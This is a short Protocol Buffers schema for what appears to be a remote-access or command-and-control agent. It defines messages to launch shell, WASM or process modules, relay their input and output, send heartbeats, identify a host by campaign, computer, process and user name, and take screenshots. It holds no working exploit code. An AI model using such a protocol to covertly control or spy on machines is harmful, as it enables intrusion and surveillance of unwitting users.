syntax = "proto3";
package migrat;

option go_package = ".";

message ModuleStart {
    string name = 1;
    bytes data = 2;
    repeated string args = 3;

    enum ModuleType {
        MODULE_SYSTEMSHELL = 0;
        MODULE_WASM = 1;
        MODULE_PROCESS = 2;
    }

    ModuleType type = 4;
}

message ModuleList {
    repeated string modules = 1;
}

message ModuleOutput {
    string name = 1;
    string output = 2;
}

message ModuleInput {
    string name = 1;
    string input = 2;
}

message Error {
    string message = 1;
}

message HeartbeatResponse {
    bool keep_open = 1;
}

message Ident {
    string id = 1;
    string campainId = 2;
    string computerName = 3;
    string processname = 4;
    string username = 5;
}

message TakeScreenshot {
    int32 screen = 1;
}

message Screenshot {
    string time = 1;
    bytes data = 2;
}